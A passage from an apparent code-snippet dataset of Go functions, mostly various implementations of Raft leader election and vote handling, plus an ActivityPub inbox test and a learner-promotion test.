used\n\t\t\t\t//fmt.Println(\"Got the vote\", response.voteGranted)\n\t\t\t\tif response.voteGranted {\n\t\t\t\t\t//\t\t\t\t\ttemp := r.f_specific[response.id] //NOT ABLE TO DO THIS--WHY??--WORK THIS WAY\n\t\t\t\t\t//\t\t\t\t\ttemp.vote = true\n\n\t\t\t\t\tr.f_specific[response.id].vote = true\n\t\t\t\t\t//r.voteCount = r.voteCount + 1\n\t\t\t\t}\n\t\t\t\tvoteCount := r.countVotes()\n\t\t\t\t//fmt.Println(\"I am:\", r.Myconfig.Id, \"Votecount is\", voteCount)\n\t\t\t\tif voteCount >= majority {\n\t\t\t\t\t//fmt.Println(\"Votecount is majority, I am new leader\", r.Myconfig.Id)\n\t\t\t\t\tElectionTimer.Stop()\n\t\t\t\t\tr.LeaderConfig.Id = r.Myconfig.Id //update leader details\n\t\t\t\t\treturn leader //become the leader\n\t\t\t\t}\n\n\t\t\tcase AppendEntriesReq: //received an AE request instead of votes, i.e. some other leader has been elected\n\t\t\t\trequest := req.(AppendEntriesReq)\n\t\t\t\t//Can be clubbed with serviceAppendEntriesReq with few additions!--SEE LATER\n\n\t\t\t\t//fmt.Println(\"I am \", r.Myconfig.Id, \"candidate,got AE_Req from\", request.leaderId, \"terms my,leader are\", r.currentTerm, request.term)\n\t\t\t\twaitTime_secs := secs * time.Duration(waitTime)\n\t\t\t\tappEntriesResponse := AppendEntriesResponse{}\n\t\t\t\tappEntriesResponse.followerId = r.Myconfig.Id\n\t\t\t\tappEntriesResponse.success = false //false by default, in case of heartbeat or invalid leader\n\t\t\t\tif request.term >= r.currentTerm { //valid leader\n\t\t\t\t\tr.LeaderConfig.Id = request.leaderId //update leader info\n\t\t\t\t\tElectionTimer.Reset(waitTime_secs) //reset the timer\n\t\t\t\t\tvar myLastIndexTerm int\n\t\t\t\t\tif len(r.myLog) == 0 {\n\t\t\t\t\t\tmyLastIndexTerm = -1\n\n\t\t\t\t\t} else {\n\t\t\t\t\t\tmyLastIndexTerm = r.myLog[r.myMetaData.lastLogIndex].Term\n\t\t\t\t\t}\n\t\t\t\t\tif request.leaderLastLogIndex == r.myMetaData.lastLogIndex && request.term == myLastIndexTerm { //this is heartbeat from a valid leader\n\t\t\t\t\t\tappEntriesResponse.success = true\n\t\t\t\t\t}\n\t\t\t\t\tsend(request.leaderId, appEntriesResponse)\n\t\t\t\t\treturn follower\n\t\t\t\t} else {\n\t\t\t\t\t//check if log is same\n\t\t\t\t\t//fmt.Println(\"In candidate, AE_Req-else\")\n\t\t\t\t\tsend(request.leaderId, appEntriesResponse)\n\t\t\t\t}\n\t\t\tcase int:\n\t\t\t\twaitTime_secs := secs * time.Duration(waitTime)\n\t\t\t\tElectionTimer.Reset(waitTime_secs)\n\t\t\t\tbreak //come out of inner loop i.e. restart the election process\n\t\t\t\t//default: if something else comes, then ideally it should ignore that and again wait for correct type of response on channel\n\t\t\t\t//it does this, in the present code structure\n\t\t\t}\n\t\t}\n\t}\n}", "func (a *RPC) VoteForLeader(args *VoteInfo,reply *bool) error{\n\t\n\tse := r.GetServer(r.id)\n\tif ( (args.ElectionTerm >= r.currentTerm) && (args.LastCommit >= se.LsnToCommit) && (args.ElectionTerm != r.votedTerm) && se.isLeader==2){\n\t\tr.votedTerm=args.ElectionTerm\n\t\t*reply = true\n\t} else {\n\t\t*reply = false\n\t}\nreturn nil\n}", "func (r *Raft) countVotes() (VoteCount int) {\n\tfor i := 0; i < noOfServers; i++ { //change it to range ClusterObj.Servers\n\t\tif r.f_specific[i].Vote {\n\t\t\tVoteCount += 1\n\t\t}\n\t}\n\n\treturn\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// TODO: fail this rpc when killed\n\n\t// Your code here (2A, 2B).\n\tisGoodRequestVote := false\n\trf.mu.Lock()\n\n\tdefer func() {\n\t\tAssertF(reply.Term >= args.Term, \"reply.Term {%d} >= args.Term {%d}\", reply.Term, args.Term)\n\t\trf.mu.Unlock()\n\t\trf.resetElectionTimerIf(isGoodRequestVote)\n\t}()\n\n\tif args.Term < rf.currentTerm {\n\t\t*reply = RequestVoteReply{Term: rf.currentTerm, VoteGranted: false}\n\t\treturn\n\t}\n\n\tif args.Term > rf.currentTerm {\n\t\trf.transitionToFollower(args.Term, -1)\n\t}\n\n\tAssertF(args.Term == rf.currentTerm, \"\")\n\n\tif (rf.votedFor == -1 || rf.votedFor == args.CandidateId) && rf.isUptoDate(args.LastLogIndex, args.LastLogTerm) {\n\t\tisGoodRequestVote = true\n\t\trf.votedFor = args.CandidateId\n\t\t*reply = RequestVoteReply{Term: args.Term, VoteGranted: true}\n\t} else {\n\t\t*reply = RequestVoteReply{Term: args.Term, VoteGranted: false}\n\t}\n\n\trf.persist()\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\n\n\t//fmt.Printf(\"成功调用RequestVote!\\n\")\n\t// Your code here (2A, 2B).\n\t//rf.mu.Lock()\n\t//current_time:=time.Now().UnixNano()/1e6\n\t//&&current_time-rf.voted_time>800\n\trf.mu.Lock()\n\n\tif (rf.term>args.Candidate_term)&&((args.Last_log_term>rf.Last_log_term)||(args.Last_log_term==rf.Last_log_term&&args.Last_log_term_lenth>=rf.last_term_log_lenth)){\n\t\trf.term=args.Candidate_term\n\t\trf.state=0\n\t}\n\n\n\t/*\n\t\tif args.Append==true&&((args.Newest_log.Log_Term<rf.Last_log_term)||(args.Newest_log.Log_Term==rf.Last_log_term&&args.Last_log_term_lenth<rf.Last_log_term)){\n\t\t\treply.Term=args.Candidate_term+1\n\t\t\treply.Last_log_term=rf.Last_log_term\n\t\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\t\treply.Append_success=false\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t}\n\t*/\n\t//if args.Second==true{\n\t//\tfmt.Printf(\"!\\n!\\n!\\n!\\n!\\n编号为%d的raft实例收到编号为%d的leader的second请求!本机term是%d,leader term是%d,args.Append是%v\\n\",rf.me,args.From,rf.term,args.Candidate_term,args.Append)\n\t//}\n\n\tif rf.state==2&&((rf.term<args.Candidate_term)||(rf.term==args.Candidate_term&&args.Last_log_term<rf.Last_log_term))&&args.Votemsg==false{\n\t\t//fmt.Printf(\"分区恢复后编号为%d的raft实例的term是%d,发现自己已经不是leader!leader是%d,leader的term是%d\\n\",rf.me,rf.term,args.From,args.Candidate_term)\n\t\trf.state=0\n\t\trf.leaderID=args.From\n\t}\n\n\n\n\tif args.Candidate_term>=rf.term{\n\t\t//rf.term=args.Candidate_term\n\t\t//if args.Second==true{\n\t\t//\tfmt.Printf(\"服务器上的SECOND进入第一个大括号\\n\")\n\t\t//}\n\t\tif args.Append == false {\n\t\t\tif args.Votemsg == true && rf.voted[args.Candidate_term] == 0&&((args.Last_log_term>rf.Last_log_term)||(args.Last_log_term==rf.Last_log_term&&args.Last_log_term_lenth>=rf.last_term_log_lenth)) { //合法投票请求\n\t\t\t\t//fmt.Printf(\"编号为%d的raft实例对投票请求的回答为true,term统一更新为为%d\\n\",rf.me,rf.term)\n\n\t\t\t\t//rf.term = args.Candidate_term\n\t\t\t\trf.voted[args.Candidate_term] = 1\n\t\t\t\treply.Vote_sent = true\n\n\t\t\t\t//rf.voted_time=time.Now().UnixNano()/1e6\n\n\t\t\t}else if args.Votemsg==true{ //合法的纯heartbeat\n\t\t\t\tif rf.voted[args.Candidate_term]==1 {\n\t\t\t\t\treply.Voted = true\n\t\t\t\t}\n\t\t\t\t//fmt.Printf(\"请求方的term是%d,本机的term是%d,来自%d的投票请求被%d拒绝!rf.last_log_term是%d,rf.last_log_lenth是%d,本机的rf.last_log_term是%d,rf.last_log_lenth是%d\\n\",args.Candidate_term,rf.term,args.From,rf.me,args.Last_log_term,args.Last_log_term_lenth,rf.Last_log_term,rf.last_term_log_lenth)\n\t\t\t}\n\t\t\treply.Term=rf.term\n\n\t\t\t//rf.term=args.Candidate_term//!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\t\t\t//if args.Votemsg==true{//!!!!!!!!!!!!!!\n\t\t\t//\trf.term=args.Candidate_term//!!!!!!!!!!!!\n\t\t\t//}//!!!!!!!!!!!!!!!!!\n\n\t\t} else { //这条是关于日志的\n\t\t\t//这个请求是日志同步请求,接收方需要将自己的日志最后一条和leader发过来的声称的进行比较,如果leader的更新且leader的PREV和自己的LAST相同就接受\n\t\t\t//还得找到最后一个一致的日志位置,然后将后面的全部更新为和leader一致的,这意味着中间多次的RPC通信\n\n\t\t\t/*\n\t\t\tif args.Newest_log.Log_Term<rf.Last_log_term{\n\t\t\t\treply.Wrong_leader=true\n\t\t\t\treply.Term=rf.term\n\t\t\t\treply.Append_success=false\n\t\t\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\t\t\treturn\n\t\t\t}\n*/\n\n\t\t\tif (rf.Last_log_term>args.Last_log_term)||(rf.Last_log_term==args.Last_log_term&&rf.last_term_log_lenth>args.Last_log_term_lenth){\n\t\t\t\treply.Append_success=false\n\t\t\t\treply.Last_log_term=rf.Last_log_term\n\t\t\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\t\t\trf.mu.Unlock()\n\t\t\t\treturn\n\t\t\t}\n\n\n\t\t\trf.term=args.Candidate_term\n\t\t\tif args.Second==true{\n\t\t\t\t//\tfmt.Printf(\"在服务器端进入second阶段!\\n\")\n\t\t\t\trf.log=rf.log[:args.Second_position]\n\t\t\t\trf.log=append(rf.log,args.Second_log...)\n\t\t\t\treply.Append_success=true\n\t\t\t\trf.Last_log_term=args.Last_log_term\n\t\t\t\trf.last_term_log_lenth=args.Last_log_term_lenth\n\t\t\t\trf.Last_log_index=len(rf.log)-1\n\t\t\t\trf.Log_Term=args.Log_Term\n\t\t\t\t//fmt.Printf(\"Second APPend在服务器端成功!现在编号为%d的raft实例的log是%v, last_log_term是%d,term是%d\\n\",rf.me,rf.log,rf.Last_log_term,rf.term)\n\t\t\t}else{\n\t\t\t\tif args.Append_Try == false {//try用于表示是否是第一次append失败了现在正在沟通\n\t\t\t\t\trf.append_try_log_index = rf.Last_log_index\n\t\t\t\t\trf.append_try_log_term=rf.Last_log_term\n\t\t\t\t}\n\t\t\t\tif args.Prev_log_index != rf.append_try_log_index || args.Prev_log_term != rf.append_try_log_term{\n\t\t\t\t\t//fmt.Printf(\"匹配失败!!!%d号leader发过来的PREV_log_index是%d,本机%d的last_log_index是%d,PREV_term是%d,本机的last_log_term是%d!\\n\",args.From,args.Prev_log_index,rf.me,rf.append_try_log_index,args.Prev_log_term,rf.append_try_log_term)\n\t\t\t\t\treply.Vote_sent = false//匹配失败后进入双方沟通try\n\t\t\t\t\treply.Append_success = false\n\n\t\t\t\t\treply.Log_Term=rf.Log_Term\n\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t} else { //说明没问题。可以更新\n\t\t\t\t\t//fmt.Printf(\"匹配成功!!!%d号是leader,发过来的PREV_log_index是%d,本机的last_log_index是%d,PREV_term是%d,本机的last_log_term是%d,准备更新本机日志!!\\n\", args.From, args.Prev_log_index, rf.append_try_log_index, args.Prev_log_term, rf.append_try_log_term)\n\t\t\t\t\t//rf.Last_log_term = args.Last_log_term\n\t\t\t\t\trf.last_term_log_lenth=args.Last_log_term_lenth\n\t\t\t\t\trf.log = append(rf.log, args.Newest_log)\n\t\t\t\t\trf.Last_log_index += 1\n\t\t\t\t\trf.Log_Term = args.Log_Term\n\t\t\t\t\trf.Last_log_term=args.Newest_log.Log_Term\n\t\t\t\t\treply.Append_success = true\n\t\t\t\t\t//fmt.Printf(\"APPend成功,现在编号为%d的raft实例的log是%v,last_log_term是%d,term是%d\\n\",rf.me,rf.log,rf.Last_log_term,rf.term)\n\t\t\t\t}\n\t\t\t}\n\t\t\trf.log_added_content = args.Newest_log\n\t\t\trf.last_term_log_lenth=0\n\n\t\t\tfor cc:=len(rf.log)-1;cc>-1;cc--{\n\t\t\t\tif rf.log[cc].Log_Term!=rf.Last_log_term{\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\trf.last_term_log_lenth+=1\n\t\t\t}\n\n\n\t\t}\n\n\t\t//fmt.Printf(\"在更新heartbeat之前\\n\")\n\t\tif args.Votemsg==false {//加上个约束条件更严谨,加上了表示是在heartbeat开始之后认同了这个是leader,否则在投票阶段就认同了\n\t\t\t//fmt.Printf(\"rf.last_log_term %d, args.last_log_term %d\\n\",rf.Last_log_term,args.Last_log_term)\n\t\t\tif args.Last_log_term==rf.Last_log_term {//!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\t\t\t\tif args.Commit_MSG == true {\n\t\t\t\t\t//if len(rf.Log_Term)==len(args.Log_Term)&&rf.Log_Term[len(rf.Log_Term)-1]==args.Log_Term[len(args.Log_Term)-1]{\n\t\t\t\t\t//if len(args.Log_Term)==len(rf.Log_Term)&&args.Last_log_term==rf.Last_log_term {\n\t\t\t\t\tfor cc := rf.committed_index + 1; cc <= rf.Last_log_index; cc++ {\n\t\t\t\t\t\trf.committed_index = cc\n\t\t\t\t\t\t//!-------------------------fmt.Printf(\"在follower %d 上进行commit,commit_index是%d,commit的内容是%v,commit的term是%d,last_log_term是%d, rf.log是太长暂时鸽了\\n\", rf.me, cc, rf.log[cc].Log_Command, rf.log[cc].Log_Term, rf.Last_log_term)\n\t\t\t\t\t\trf.applych <- ApplyMsg{true, rf.log[rf.committed_index].Log_Command, rf.committed_index}\n\t\t\t\t\t}\n\n\t\t\t\t\treply.Commit_finished = true\n\t\t\t\t\t//}else{\n\t\t\t\t\t//}\n\t\t\t\t\t//}\n\t\t\t\t}\n\t\t\t}//!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n\t\t\trf.leaderID = args.From\n\t\t\trf.term = args.Candidate_term\n\t\t\trf.leaderID=args.From\n\n\n\t\t}\n\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\treply.Last_log_term=rf.Last_log_term\n\n\t\tif args.Votemsg==false {\n\t\t\tif rf.state == 0 {\n\t\t\t\trf.last_heartbeat <- 1\n\t\t\t}\n\t\t}\n\n\t}else{\n\t\t//fmt.Printf(\"term都不符,明显是非法的!\\n\")\n\t\treply.Vote_sent = false\n\t\treply.Append_success = false\n\t\treply.Term=rf.term\n\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\treply.Last_log_term=rf.Last_log_term\n\t\t//-------------------if (args.Last_log_term>rf.Last_log_term)||(args.Last_log_term==rf.Last_log_term&&args.Last_log_term_lenth>=rf.last_term_log_lenth){\n\t\t//----------------------\treply.You_are_true=true\n\t\t//------------------------}\n\t}\n\trf.mu.Unlock()\n\t//fmt.Printf(\"编号为%d的raft实例通过RequestVote()收到了heartbeat\\n\",rf.me)\n\t//reply.voted<-true\n\t//rf.mu.Unlock()\n}", "func (rf *Raft) handleVoteReply(reply* RequestVoteReply) {\n\tDebugPrint(\"%d(%d): receive vote reply from %d(%d), state: %d\\n\",\n\t\trf.me, rf.term, reply.To, reply.Term, rf.state)\n\tstart := time.Now()\n\tdefer calcRuntime(start, \"handleVoteReply\")\n\tif !rf.checkVote(reply.To, reply.Term, reply.MsgType, &reply.VoteGranted) {\n\t\treturn\n\t}\n\tif (rf.state == Candidate && reply.MsgType == MsgRequestVoteReply) ||\n\t\t(rf.state == PreCandidate && reply.MsgType == MsgRequestPrevoteReply) {\n\t\tDebugPrint(\"%d(%d): access vote reply from %d(%d), accept: %t, state: %d\\n\",\n\t\t\trf.me, rf.term, reply.To, reply.Term, reply.VoteGranted, rf.state)\n\t\tif reply.VoteGranted {\n\t\t\trf.votes[reply.To] = 1\n\t\t} else {\n\t\t\trf.votes[reply.To] = 0\n\t\t}\n\t\tquorum := len(rf.peers) / 2 + 1\n\t\taccept := 0\n\t\treject := 0\n\t\tfor _, v := range rf.votes {\n\t\t\tif v == 1 {\n\t\t\t\taccept += 1\n\t\t\t} else if v == 0 {\n\t\t\t\treject += 1\n\t\t\t}\n\t\t}\n\t\tif accept >= quorum {\n\t\t\tfor idx, v := range rf.votes {\n\t\t\t\tif v == 1 {\n\t\t\t\t\tDebugPrint(\"%d vote for me(%d).\\n\", idx, rf.me)\n\t\t\t\t}\n\t\t\t}\n\t\t\tDebugPrint(\"%d win.\\n\", rf.me)\n\t\t\tif rf.state == PreCandidate {\n\t\t\t\tfmt.Printf(\"The server %d, wins Pre-vote Election\\n\", rf.me)\n\t\t\t\trf.campaign(MsgRequestVote)\n\t\t\t} else {\n\t\t\t\tDebugPrint(\"%d win vote\\n\", rf.me)\n\t\t\t\trf.becomeLeader()\n\t\t\t\tfmt.Printf(\"The server %d, wins Election\\n\", rf.me)\n\t\t\t\t// rf.propose(nil, rf.raftLog.GetDataIndex())\n\t\t\t\trf.proposeNew(nil, rf.raftLog.GetDataIndex(), rf.me)\n\t\t\t}\n\t\t} else if reject == quorum {\n\t\t\tDebugPrint(\"%d has been reject by %d members\\n\", rf.me, reject)\n\t\t\trf.becomeFollower(rf.term, -1)\n\t\t}\n\t}\n\tDebugPrint(\"%d(%d): receive vote end\\n\", rf.me, rf.term)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tdefer rf.persist()\n\n\treply.VoteGranted = false\n\n\tif args.Term < rf.currentTerm {\n\t\treply.Term = rf.currentTerm\n\t\treply.VoteGranted = false\n\t\treturn\n\t}\n\n\tif args.Term == rf.currentTerm {\n\t\tif rf.voteFor == -1 || rf.voteFor == args.CandidateId {\n\t\t\tlastLogTerm, lastLogIdx := rf.getLastLogTermAndIdx()\n\t\t\tif lastLogTerm < args.LastLogTerm || lastLogTerm == args.LastLogTerm && lastLogIdx <= args.LastLogIdx {\n\t\t\t\treply.VoteGranted = true\n\t\t\t\trf.voteFor = args.CandidateId\n\t\t\t\treturn\n\t\t\t} else {\n\t\t\t\treply.VoteGranted = false\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\treply.VoteGranted = false\n\t\t\treturn\n\t\t}\n\t}\n\n\tif args.Term > rf.currentTerm {\n\t\t//收到更大的term,先更新状态;再判断日志的新旧来投票\n\t\trf.changeToFollower(args.Term)\n\t\t//fixbug: 忘记在收到更大的term时更新votefor\n\t\trf.voteFor = -1\n\n\t\treply.Term = args.Term\n\n\t\tlastLogTerm, lastLogIdx := rf.getLastLogTermAndIdx()\n\t\tif lastLogTerm < args.LastLogTerm || lastLogTerm == args.LastLogTerm && lastLogIdx <= args.LastLogIdx {\n\t\t\treply.VoteGranted = true\n\t\t\trf.voteFor = args.CandidateId\n\t\t\treturn\n\t\t} else {\n\t\t\treply.VoteGranted = false\n\t\t\treturn\n\t\t}\n\t}\n\n}", "func (r *Raft) becomeFollower(term uint64, lead uint64) {\n\t// Your Code Here (2A).\n\tr.State = StateFollower\n\tr.Term = term\n\tr.Lead = lead\n\tr.Vote = r.Lead\n\tr.electionElapsed = 0\n\tr.actualElectionTimeout = rand.Intn(r.electionTimeout) + r.electionTimeout\n\tr.leadTransferee = None\n}", "func TestPostInbox_Accept_AcceptFollowAddsToFollowersIfOwned(t *testing.T) {\n\tapp, _, fedApp, _, fedCb, _, _, p := NewPubberTest(t)\n\tresp := httptest.NewRecorder()\n\treq := ActivityPubRequest(httptest.NewRequest(\"POST\", testInboxURI, bytes.NewBuffer(MustSerialize(testAcceptFollow))))\n\tfedApp.unblocked = func(c context.Context, actorIRIs []url.URL) error {\n\t\treturn nil\n\t}\n\tgotOwns := 0\n\tvar ownsIRI url.URL\n\tapp.owns = func(c context.Context, id url.URL) bool {\n\t\tgotOwns++\n\t\townsIRI = id\n\t\treturn true\n\t}\n\tgotGet := 0\n\tvar getIRI url.URL\n\tapp.get = func(c context.Context, id url.URL) (PubObject, error) {\n\t\tgotGet++\n\t\tgetIRI = id\n\t\tsallyActor := &vocab.Person{}\n\t\tsallyActor.SetInboxAnyURI(*sallyIRIInbox)\n\t\tsallyActor.SetId(*sallyIRI)\n\t\tsallyActor.SetFollowingCollection(&vocab.Collection{})\n\t\treturn sallyActor, nil\n\t}\n\tgotSet := 0\n\tvar setObject PubObject\n\tapp.set = func(c context.Context, o PubObject) error {\n\t\tgotSet++\n\t\tsetObject = o\n\t\treturn nil\n\t}\n\tfedCb.accept = func(c context.Context, s *streams.Accept) error {\n\t\treturn nil\n\t}\n\texpectedFollowing := &vocab.Collection{}\n\texpectedFollowing.AddItemsObject(samActor)\n\thandled, err := p.PostInbox(context.Background(), resp, req)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t} else if !handled {\n\t\tt.Fatalf(\"expected handled, got !handled\")\n\t} else if gotOwns != 1 {\n\t\tt.Fatalf(\"expected %d, got %d\", 1, gotOwns)\n\t} else if ownsIRI.String() != sallyIRIString {\n\t\tt.Fatalf(\"expected %s, got %s\", sallyIRIString, ownsIRI.String())\n\t} else if gotGet != 1 {\n\t\tt.Fatalf(\"expected %d, got %d\", 1, gotGet)\n\t} else if getIRI.String() != sallyIRIString {\n\t\tt.Fatalf(\"expected %s, got %s\", sallyIRIString, getIRI.String())\n\t} else if gotSet != 1 {\n\t\tt.Fatalf(\"expected %d, got %d\", 1, gotSet)\n\t} else if err := PubObjectEquals(setObject, expectedFollowing); err != nil {\n\t\tt.Fatal(err)\n\t}\n}", "func TestLearnerPromotion(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\tnt := newNetwork(n1, n2)\n\n\tif n1.state == StateLeader {\n\t\tt.Error(\"peer 1 state is leader, want not\", n1.state)\n\t}\n\n\t// n1 should become leader\n\tsetRandomizedElectionTimeout(n1, n1.electionTimeout)\n\tfor i := 0; i < n1.electionTimeout; i++ {\n\t\tn1.tick()\n\t}\n\n\tif n1.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateLeader)\n\t}\n\tif n2.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateFollower)\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgBeat})\n\tgrp2 := pb.Group{\n\t\tNodeId: 2,\n\t\tGroupId: 1,\n\t\tRaftReplicaId: 2,\n\t}\n\tn1.addNode(2, grp2)\n\tn2.addNode(2, grp2)\n\tif n2.isLearner {\n\t\tt.Error(\"peer 2 is learner, want not\")\n\t}\n\n\t// n2 start election, should become leader\n\tsetRandomizedElectionTimeout(n2, n2.electionTimeout)\n\tfor i := 0; i < n2.electionTimeout; i++ {\n\t\tn2.tick()\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgBeat})\n\n\tif n1.state != StateFollower {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", n1.state, StateFollower)\n\t}\n\tif n2.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateLeader)\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n DPrintf(\"%d: %d recieve RequestVote from %d:%d\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate)\n // Your code here (2A, 2B).\n rf.mu.Lock()\n defer rf.mu.Unlock()\n if args.Term < rf.currentTerm {\n \n reply.VoteGranted = false\n reply.Term = rf.currentTerm\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n\n if args.Term > rf.currentTerm {\n rf.votedFor = -1\n rf.currentTerm = args.Term\n }\n\n if rf.votedFor == -1 || rf.votedFor == args.Candidate {\n // election restriction\n if args.LastLogTerm < rf.log[len(rf.log) - 1].Term ||\n (args.LastLogTerm == rf.log[len(rf.log) - 1].Term &&\n args.LastLogIndex < len(rf.log) - 1) {\n rf.votedFor = -1\n reply.VoteGranted = false\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n\n \n if rf.state == FOLLOWER {\n rf.heartbeat <- true\n }\n rf.state = FOLLOWER\n rf.resetTimeout()\n rf.votedFor = args.Candidate\n\n \n reply.VoteGranted = true\n reply.Term = args.Term\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n reply.VoteGranted = false\n reply.Term = args.Term\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n}", "func (r *Raft) becomeFollower(term uint64, lead uint64) {\n\tr.State = StateFollower\n\tr.Term = term\n\tr.Lead = lead\n\tr.Vote = None\n\tr.electionElapsed = 0\n\tr.randomElectionTimeout = randomTimeout(r.electionTimeout)\n\t// Your Code Here (2A).\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\n\t//fmt.Printf(\"Server %d: log is %v\\n\", rf.me, rf.log)\n\n\tvar newer bool\n\n\tif args.Term > rf.currentTerm {\n\t\trf.votedFor = -1\n\t}\n\n\tif len(rf.log) == 0 || args.LastLogTerm > rf.log[len(rf.log)-1].Term {\n\t\tnewer = true\n\t} else if args.LastLogTerm == rf.log[len(rf.log)-1].Term && len(rf.log) <= args.LastLogIndex+1 {\n\t\tnewer = true\n\t}\n\n\tif newer == true && (rf.votedFor == -1 || rf.votedFor == args.CandidateID) {\n\t\treply.VoteGranted = true\n\t} else {\n\t\treply.VoteGranted = false\n\t}\n\n\tvar votedFor int\n\tif reply.VoteGranted {\n\t\tvotedFor = args.CandidateID\n\t} else {\n\t\tvotedFor = -1\n\t}\n\trf.votedFor = votedFor\n\n\tif args.Term < rf.currentTerm {\n\t\treply.VoteGranted = false\n\t} else if args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\tif rf.state != Follower {\n\t\t\trf.convertToFollower(rf.currentTerm, votedFor)\n\t\t}\n\t}\n\n\treply.Term = rf.currentTerm\n\n\trf.persist()\n\n\tif reply.VoteGranted == true {\n\t\tgo func() {\n\t\t\tselect {\n\t\t\tcase <-rf.grantVoteCh:\n\t\t\tdefault:\n\t\t\t}\n\t\t\trf.grantVoteCh <- true\n\t\t}()\n\t}\n}", "func (r *RaftNode) doFollower() stateFunction {\n\n\tr.initFollowerState()\n\n\t// election timer for handling going into candidate state\n\telectionTimer := r.randomTimeout(r.config.ElectionTimeout)\n\n\tfor {\n\t\tselect {\n\t\tcase shutdown := <-r.gracefulExit:\n\t\t\tif shutdown {\n\t\t\t\tr.Out(\"Shutting down\")\n\t\t\t\treturn nil\n\t\t\t}\n\n\t\tcase <-electionTimer:\n\t\t\t// if we timeout with no appendEntries heartbeats,\n\t\t\t// start election with this node\n\t\t\tr.Out(\"Election timeout\")\n\n\t\t\t// for debugging purposes:\n\t\t\tif r.debugCond != nil {\n\t\t\t\tr.debugCond.L.Lock()\n\t\t\t\tr.Out(\"Waiting for broadcast...\")\n\t\t\t\tr.debugCond.Wait()\n\t\t\t\tr.debugCond.L.Unlock()\n\t\t\t}\n\n\t\t\treturn r.doCandidate\n\n\t\tcase msg := <-r.requestVote:\n\t\t\tif votedFor, _ := r.handleRequestVote(msg); votedFor {\n\t\t\t\t// reset timeout if voted so not all (non-candidate-worthy) nodes become candidates at once\n\t\t\t\tr.Debug(\"Election timeout reset\")\n\t\t\t\telectionTimer = r.randomTimeout(r.config.ElectionTimeout)\n\t\t\t}\n\t\tcase msg := <-r.appendEntries:\n\t\t\tif resetTimeout, _ := r.handleAppendEntries(msg); resetTimeout {\n\t\t\t\telectionTimer = r.randomTimeout(r.config.ElectionTimeout)\n\t\t\t}\n\t\tcase msg := <-r.registerClient:\n\t\t\tr.Out(\"RegisterClient received\")\n\t\t\tr.handleRegisterClientAsNonLeader(msg)\n\n\t\tcase msg := <-r.clientRequest:\n\t\t\tr.handleClientRequestAsNonLeader(msg)\n\t\t}\n\t}\n}", "func (rf *Raft) BeCandidate() {\n\t//////fmt.Print(\"%d becomes candidate\\n\", rf.me)\n\trf.state = Candidate\n\trf.currentTerm += 1\n\trf.votedFor = rf.me\n}", "func (rf *Raft) sendRequestVote(server int, args RequestVoteArgs, reply *RequestVoteReply) bool {\n\tok := rf.peers[server].Call(\"Raft.RequestVote\", args, reply)\n\trf.mtx.Lock()\n\tdefer rf.mtx.Unlock()\n\n\tif ok {\n\t\tif rf.state != STATE_CANDIDATE {\n\t\t\treturn ok\n\t\t}\n\t\tif args.Term != rf.currentTerm { // consider the current term's reply\n\t\t\treturn ok\n\t\t}\n\t\tif reply.Term > rf.currentTerm {\n\t\t\trf.currentTerm = reply.Term\n\t\t\trf.state = STATE_FOLLOWER\n\t\t\trf.voteFor = -1\n\t\t\trf.persist()\n\t\t}\n\t\tif reply.VoteGranted {\n\t\t\trf.beenVotedCount++\n\t\t\tif rf.state == STATE_CANDIDATE && rf.beenVotedCount > len(rf.peers)/2 {\n\t\t\t\trf.state = STATE_FOLLOWER // ...\n\t\t\t\trf.chanBecomeLeader <- 1\n\t\t\t}\n\t\t}\n\t}\n\n\treturn ok\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\t// defer 